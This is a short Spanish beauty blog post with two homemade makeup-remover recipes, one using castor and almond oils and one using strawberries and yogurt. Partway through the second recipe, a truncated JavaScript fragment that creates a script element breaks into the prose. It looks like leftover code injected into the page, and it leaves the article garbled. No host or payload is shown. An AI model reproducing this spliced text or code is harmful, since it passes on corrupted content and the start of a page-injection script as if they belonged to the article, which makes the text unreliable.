Salud y belleza » Belleza, Bienestar

Desmaquilladores naturales, la mejor forma de cuidar la piel

Sin Comentarios

De entre todos los productos estéticos que se conocen, los llamados desmaquilladores son sin lugar a dudas uno de los más poderosos y, por ende, complicados para la piel.

Es lógico: para remover un químico hace falta otro de mayor calibre. Y si bien la tecnología avanza al punto de elaborar fórmulas menos dañinas nada de esto se compara a lo que brinda la naturaleza: en la tierra, está la solución.

Así, para lograr un equilibrio entre estética y salud, presentamos algunos consejos para fabricar desmaquillantes caseros: verse bien es parte de estar bien.

Desmaquillante de ricina

Elementos: dos cucharadas de aceite de ricina; cuatro cucharadas de aceite de almendras.

Preparación: es muy sencillo, solo basta mezclar ambos aceites y aplicarlos en el rostro. La preparación debe colocarse directamente con los dedos y, a la hora de retirar, hace falta un algodón humedecido en agua. Esta solución es muy suave y no causa irritación alguna.

Desmaquillante de fresa

Elementos: un par de fresas grandes y varias cucharadas de yogur natural

Preparación: trocear las fresas y agregarlas a un bol con el yogur natural. La aplicación es básica: colocar sobre el rostro con pequeños masajes circulares para no lastimar la zona; luego retirar con baños de agua caliente.} else {var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.